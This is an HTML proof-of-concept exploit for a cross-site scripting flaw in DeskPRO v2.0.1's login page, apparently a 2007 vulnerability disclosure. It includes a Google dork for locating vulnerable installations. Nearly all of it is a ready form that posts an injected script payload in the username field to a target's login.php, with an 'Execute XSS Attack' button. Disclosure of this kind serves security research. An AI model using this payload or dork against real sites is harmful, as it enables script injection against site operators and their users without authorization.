<!-- DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability Vulnerable: DeskPRO v2.0.1 (other versions should also be vulnerable) Google d0rk: intitle:"Powered by DeskPRO" John Martinelli john@xxxxxxxxxxxxxx http://john-martinelli.com April 8th, 2007 !--> <html> <head><title>DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability</title><body> <center><br><br><font size=4>DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability</font><br><font size=3>discovered by <a href="http://john-martinelli.com";>John Martinelli</a></font><br> <br><br> <form action="http://target.com/login.php"; method="post"> <input type=hidden name="login_form" value="login"> <input type=hidden name="_getvars" value="getvars"> <input type=hidden name="_postvars" value="postvars"> <input type=hidden name="_filevars" value="filevars"> <input type=hidden name="password" value="password"> <input type=hidden name="remember" value=0> <input name="username" size=75 value="<"<<script>alert(1);</script>"> <input type=submit value="Execute XSS Attack" class="button"> </form> </body></html>
